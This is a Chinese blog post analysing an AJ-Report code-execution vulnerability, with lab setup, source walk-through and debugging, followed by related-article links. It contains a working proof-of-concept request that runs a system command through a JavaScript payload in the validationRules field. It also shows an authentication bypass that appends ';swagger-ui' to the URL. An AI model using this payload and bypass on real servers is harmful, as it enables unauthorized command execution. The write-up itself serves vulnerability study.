代码执行漏洞分析

最新推荐文章于 2026-03-26 11:35:42 发布
原创 最新推荐文章于 2026-03-26 11:35:42 发布 · 1.1k 阅读 · 18 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#web安全 #安全 #学习

AJ-Report代码执行漏洞分析
AJ-Report是全开源的一个BI平台,DataSetParamController 中verification方法未对传入的参数进行过滤,可以执行JavaScript函数,导致命令执行漏洞。

环境搭建
将源码下并使用IDEA打开

git clone https://gitee.com/anji-plus/report.git
在这里插入图片描述
配置mysql
创建数据 aj_report ,数据库sql文件在resources/db.migration 目录下
在这里插入图片描述
配置文件存储路径

在这里插入图片描述
漏洞复现
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: 192.168.0.100:9095
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{“sampleItem”:“1”,“validationRules”:“function verification(data){a = new java.lang.ProcessBuilder(\“whoami\”).start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss=‘’;while((line = r.readLine()) != null){ss+=line};return ss;}”}
在这里插入图片描述
在这里插入图片描述
代码分析
漏洞路径
\report\report-core\src\main\java\com\anjiplus\template\gaea\business\modules\datasetparam\controller\DataSetParamController.java

verification
@PostMapping(“/verification”)
public ResponseBean verification(@Validated @RequestBody DataSetParamValidationParam param) {
DataSetParamDto dto = new DataSetParamDto();
dto.setSampleItem(param.getSampleItem());
dto.setValidationRules(param.getValidationRules());
return responseSuccessWithData(dataSetParamService.verification(dto));
}
param 接受传入的值

@Data
public class DataSetParamValidationParam implements Serializable {

/** 参数示例项 */
@NotBlank(message = “sampleItem not empty”)
private String sampleItem;


/** js校验字段值规则,满足校验返回 true */
@NotBlank(message = “validationRules not empty”)
private String validationRules;
}
需要接受的参数 sampleItem ,validationRules

并将这个参数传入dataSetParamService.verification(dto)
在这里插入图片描述
DataSetParamServiceImpl.java
该类中实现了 verification 方法

package com.anjiplus.template.gaea.business.modules.datasetparam.service.impl;

import com.anji.plus.gaea.curd.mapper.GaeaBaseMapper;
import com.anji.plus.gaea.exception.BusinessExceptionBuilder;
import com.anjiplus.template.gaea.business.modules.datasetparam.controller.dto.DataSetParamDto;
import com.anjiplus.template.gaea.business.modules.datasetparam.dao.DataSetParamMapper;
import com.anjiplus.template.gaea.business.modules.datasetparam.dao.entity.DataSetParam;
import com.anjiplus.template.gaea.business.modules.datasetparam.service.DataSetParamService;
import com.anjiplus.template.gaea.business.modules.datasetparam.util.ParamsResolverHelper;
import com.anjiplus.template.gaea.business.code.ResponseCode;
import com.fasterxml.jackson.databind.ObjectMapper;
import lombok.extern.slf4j.Slf4j;
import org.apache.commons.lang3.StringUtils;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Service;

import javax.script.Invocable;
import javax.script.ScriptEngine;
import javax.script.ScriptEngineManager;
import java.util.HashMap;
import java.util.List;
import java.util.Map;

/**
* @desc DataSetParam 数据集动态参数服务实现
* @author Raod
* @date 2021-03-18 12:12:33.108033200
**/
@Service
//@RequiredArgsConstructor
@Slf4j
public class DataSetParamServiceImpl implements DataSetParamService {

private ScriptEngine engine;
{
ScriptEngineManager manager = new ScriptEngineManager();
engine = manager.getEngineByName(“JavaScript”);
}

@Autowired
private DataSetParamMapper dataSetParamMapper;

@Override
public GaeaBaseMapper<DataSetParam> getMapper() {
return dataSetParamMapper;
}

/**
* 参数替换
*
* @param contextData
* @param dynSentence
* @return
*/
@Override
public String transform(Map<String, Object> contextData, String dynSentence) {
if (StringUtils.isBlank(dynSentence)) {
return dynSentence;
}
if (dynSentence.contains(“KaTeX parse error: Expected group as argument to '\=' at position 36: … dynSentence \= ̲ParamsResolverH…{”)) {
throw BusinessExceptionBuilder.build(ResponseCode.INCOMPLETE_PARAMETER_REPLACEMENT_VALUES, dynSentence);
}
return dynSentence;
}

/**
* 参数替换
*
* @param dataSetParamDtoList
* @param dynSentence
* @return
*/
@Override
public String transform(List<DataSetParamDto> dataSetParamDtoList, String dynSentence) {
Map<String, Object> contextData = new HashMap<>();
if (null == dataSetParamDtoList || dataSetParamDtoList.size() <= 0) {
return dynSentence;
}
dataSetParamDtoList.forEach(dataSetParamDto -> {
contextData.put(dataSetParamDto.getParamName(), dataSetParamDto.getSampleItem());
});
return transform(contextData, dynSentence);
}

/**
* 参数校验 js脚本
*
* @param dataSetParamDto
* @return
*/
@Override
public Object verification(DataSetParamDto dataSetParamDto) {

String validationRules = dataSetParamDto.getValidationRules();
if (StringUtils.isNotBlank(validationRules)) {
try {
engine.eval(validationRules);
if(engine instanceof Invocable){
Invocable invocable = (Invocable) engine;
Object exec = invocable.invokeFunction(“verification”, dataSetParamDto);
ObjectMapper objectMapper = new ObjectMapper();
if (exec instanceof Boolean) {
return objectMapper.convertValue(exec, Boolean.class);
}else {
return objectMapper.convertValue(exec, String.class);
}

}

} catch (Exception ex) {
throw BusinessExceptionBuilder.build(ResponseCode.EXECUTE_JS_ERROR, ex.getMessage());
}

}
return true;
}

/**
* 参数校验 js脚本
*
* @param dataSetParamDtoList
* @return
*/
@Override
public boolean verification(List<DataSetParamDto> dataSetParamDtoList, Map<String, Object> contextData) {
if (null == dataSetParamDtoList || dataSetParamDtoList.size() == 0) {
return true;
}

for (DataSetParamDto dataSetParamDto : dataSetParamDtoList) {
if (null != contextData) {
String value = contextData.getOrDefault(dataSetParamDto.getParamName(), “”).toString();
dataSetParamDto.setSampleItem(value);
}

Object verification = verification(dataSetParamDto);
if (verification instanceof Boolean) {
if (!(Boolean) verification) {
return false;
}
}else {
//将得到的值重新赋值给contextData
if (null != contextData) {
contextData.put(dataSetParamDto.getParamName(), verification);
}
dataSetParamDto.setSampleItem(verification.toString());
}

}
return true;
}

}

verification
@Override
public Object verification(DataSetParamDto dataSetParamDto) {

String validationRules = dataSetParamDto.getValidationRules();
if (StringUtils.isNotBlank(validationRules)) {
try {
engine.eval(validationRules);
if(engine instanceof Invocable){
Invocable invocable = (Invocable) engine;
Object exec = invocable.invokeFunction(“verification”, dataSetParamDto);
ObjectMapper objectMapper = new ObjectMapper();
if (exec instanceof Boolean) {
return objectMapper.convertValue(exec, Boolean.class);
}else {
return objectMapper.convertValue(exec, String.class);
}

}

} catch (Exception ex) {
throw BusinessExceptionBuilder.build(ResponseCode.EXECUTE_JS_ERROR, ex.getMessage());
}

}
return true;
}
private ScriptEngine engine;
{
ScriptEngineManager manager = new ScriptEngineManager();
engine = manager.getEngineByName(“JavaScript”);
}
engine.eval(validationRules): 这行代码使用了一个 engine是 ScriptEngine 的一个实例,来执行传入的 validationRules 字符串,即执行一段 JavaScript 代码。

if(engine instanceof Invocable) 这里检查 engine 是否是 Invocable 接口的实例,如果是,表示这个引擎可以调用 JavaScript 函数。

invocable.invokeFunction(“verification”, dataSetParamDto): 如果引擎可以调用,就调用名为 “verification” 的 JavaScript 函数,并传入一个 dataSetParamDto 对象作为参数。

ObjectMapper objectMapper = new ObjectMapper(): 创建了一个ObjectMapper对象,用于处理 JSON 数据。

if (exec instanceof Boolean) {
return objectMapper.convertValue(exec, Boolean.class);
}else {
return objectMapper.convertValue(exec, String.class);
}
根据 exec 对象的类型进行处理,如果是布尔类型,则将其转换为 Java 中的 Boolean 类型;否则转换为 String 类型。

return objectMapper.convertValue(…): 最后,根据 exec 的类型,使用 ObjectMapper 将其转换成相应的 Java 类型,并返回结果。

debug 调试
下断点
在这里插入图片描述
validationRules 值为JavaScript 代码

调用了ScriptEngineManager eval执行JavaScript 代码
在这里插入图片描述

权限验证
正常访问 /dataSetParam/verification 路由是需要token验证

在这里插入图片描述
搜索 The Token has expired

在这里插入图片描述
TokenFilter.java
TokenFilter拦截器中,放行swagger-ui,swagger-resources

if (uri.contains(“swagger-ui”) || uri.contains(“swagger-resources”)) {
filterChain.doFilter(request, response);
return;
}
在这里插入图片描述
使用URL截断绕过 ;
swagger-ui,swagger-resources
POST /dataSetParam/verification;swagger-ui HTTP/1.1

POST /dataSetParam/verification;swagger-resources HTTP/1.1
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
总结
verification方法传入参数validationRules,调用了ScriptEngineManager eval执行JavaScript 代码,导致的代码执行漏洞。
使用; 绕过鉴权

aj-report 编辑一个完整的大屏显示报表
09-11 4058
制作一个aj-report实例
ImageMagick远程代码执行漏洞分析
fly小灰灰的专栏
08-12 8102
1. 漏洞描述 漏洞编号: CVE-2016-3714 发现人员: Slack安全工程师Ryan Hube 漏洞简述: 产生原因是因为字符过滤不严谨所导致的执行代码. 对于文件名传递给后端的命令过滤不足,导致允许多种文件格式转换过程中远程执行代码。 影响版本: ImageMagick6.5.7-8 2012-08-17 ImageMagick6.7.7-10 2014-03-06 低版本至6.9
开源数据大屏AJ-Report
靖节先生的博客
11-22 1万+
开源数据大屏AJ-Report1. 数据大屏概述2. AJ-Report概述2.1 AJ-Report简介2.2 系统特性2.3 在线体验2.4 发行版本2.5 功能概述2.6 数据流程图3. AJ-Report项目搭建3.1 核心技术3.2 发行版部署4.实现验证4.1 配置数据源4.2 配置数据集4.3 配置大屏或报表4.4 大屏效果 1. 数据大屏概述 可视化数据大屏最近几年非常火,不但是因为其炫酷的视觉效果,还因为其各种图标帮助业务决策分析,数据分析等功能,作为控制中心不可获缺的工具,本文主要推
全面了解那些值得收藏的报表工具
一个持续编程的盲人。
05-22 1344
这些工具覆盖了从开源框架到成品模板的全场景需求,可根据项目规模、技术能力和行业特性选择合适方案。
AJ-Report vs 其他开源大屏工具:如何选择最适合你的数据可视化方案
最新发布
weixin_29044157的博客
03-26 379
本文对比了AJ-Report与其他主流开源数据大屏工具(如DataEase、Metabase、Redash)在核心功能、技术栈、可视化能力、性能扩展性等五个维度的差异,帮助用户根据业务需求选择最适合的数据可视化方案。AJ-Report在自定义组件和扩展性方面表现突出,适合需要深度定制的中型企业。
AJ-Report 初学(入门教程)
热门推荐
xhmico的博客
03-15 4万+
文章目录前言简介官网与源码下载地址准备工作1.下载2. 数据库准备发行版的配置与启动1. 修改 bootstrap.yml2. 修改 start.bat3. 启动与访问源码的配置与启动1. IDEA 导入项目2. 后端启动2. 前端启动我所踩过的坑1. 除 mysql 之外的驱动问题2. 请求超时问题3. 空值导致的空指针异常4. 表字段长度不够5. 导出文件失败总结 前言 项目里面需要用到这个 AJ-Reprot 生成动态的大屏报表,这两天也研究了下,觉得是个挺不错的开源项目,遂即整理一下以作分享。
AJ-Report:一款开源且非常强大的数据可视化大屏和报表工具
11-03 5929
AJ-Report是一个基于Java的开源报表工具,它集成了ECharts、Ant Design Vue等前端技术,致力于为企业提供一站式的数据可视化解决方案。
ThinkPHP5 远程代码执行漏洞分析
repoman的博客
03-16 8268
前言 消息刚刚曝出来的时候还以为自己能半天把漏洞给找出来,果然是太菜太年轻了,23333 漏洞分析 漏洞点 此次漏洞出现在ThinkPHP用于处理HTTP请求的Request类中,其中的method方法用于获取当前的请求类型。 thinkphp/library/think/Request.php var_method为“表单伪装变量”,可在application/config.ph...
Joomla远程代码执行漏洞分析
stonesharp的专栏
12-19 4378
说一下这个漏洞的影响和触发、利用方法。这个漏洞影响Joomla 1.5 to 3.4全版本,并且利用漏洞无需登录,只需要发送两次数据包即可(第一次:将session插入数据库中,第二次发送同样的数据包来取出session、触发漏洞、执行任意代码),后果是直接导致任意代码执行。 0x00 漏洞点 —— 反序列化session 这个漏洞存在于反序列化session的过程中。 漏洞
远程代码执行漏洞分析
kali_Ma的博客
11-08 4399
一、背景介绍 mpv项目是开源项目,可以在多个系统包括Windows、Linux、MacOs上运行,是一款流行的视频播放器,mpv软件在读取文件名称时存在格式化字符串漏洞,可以导致堆溢出并执行任意代码。 二、环境搭建 系统环境为Ubuntu x64位,软件环境可以通过两种方式搭建环境。 a. 通过源码编译,源码地址为: https://github.com/mpv-player/mpv/tree/v0.33.0 下载地址为:https://github.com/mpv-player/mpv/archive/
AJ-Report代码执行漏洞分析
qq_18193739的博客
05-06 7453
verification方法传入参数,调用了eval执行JavaScript 代码,导致的代码执行漏洞。使用;绕过鉴权。
AJ-Report开源数据可视化引擎入门实践
Heartsuit的博客
07-29 6602
这篇文章是关于 AJ-Report 内部分享的小总结,当时是按照以下内容进行讲解演示的。 下载、源码启动 数据源、数据集、大屏 大屏可视化 扩展数据源: ClickHouse 开源数据可视化引擎: DataEase , FlyFish , GoView , DataGear , Superset , Grafana , Metabase … AJ-Report是全开源的一个国产BI平台,基于Spring Boot+MyBatisPlus+Vue技术栈实现的前后端分离项目,易于部署与整合。
开源BI 平台AJ-Report —— 筑梦之路
筑梦之路
12-15 1231
AJ-Report: AJ-Report是一个完全开源,拖拽编辑的可视化设计工具。三步快速完成大屏:配置数据源---->写SQL配置数据集---->拖拽生成大屏。让管理层随时随地掌控业务动态,让每个决策都有数据支撑。
AJ-Report是一个完全开源,拖拽编辑的可视化设计工具
欧菲丽的博客
05-23 3106
AJ-Report是全开源的一个BI平台,酷炫大屏展示,能随时随地掌控业务动态,让每个决策都有数据支撑。多数据源支持,内置mysql、elasticsearch、kudu驱动,支持自定义数据集省去数据接口开发,目前已支持30+种大屏组件/图表,不会开发,照着设计稿也可以制作大屏。三步轻松完成大屏设计:配置数据源---->写SQL配置数据集---->拖拽配置大屏---->保存发布。欢迎体验。组件介绍大屏设计(AJ-Report)是一个可视化拖拽编辑的,直观,酷炫,具有科技感的图表工具全开源项目。
AJ-Report小白配置大屏手册
CodeRain的博客
07-18 5074
AJ-Report 小白配置大屏教程
可配置大屏--AJ-report使用说明(有问题可私信)
m0_71863467的博客
10-08 3782
可配置大屏--AJ-report使用说明
2024版最新148款CTF工具整理大全(附下载安装包)含基础环境、Web 安全、加密解密、密码爆破、文件、隐写、逆向、PWN等全套工具
Libra1313的博客
10-23 1万+
经常会有大学生粉丝朋友私信大白,想通过打CTF比赛镀金,作为进入一线互联网大厂的门票。但是在CTF做题很多的时候都会用到工具,所以在全网苦寻CTF比赛工具安装包!
AJ-REPORT全新鉴权及远程命令修复绕过分析,从零基础到精通,收藏这篇就够了!
喜欢Python编程的程序员柚柚呀
03-05 1167
朋友们现在只对常读和星标的公众号才展示大图推送,建议大家把“安全****“”,否则可能就看不到了啦**原文由作者授权,首发在先知社区**
AJ-Report二次开发2:新增自定义组件
Remo_jun的博客
06-06 3200
以新增表格组件为例子,关于AJ-Report新增自定义表格组件的参考。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值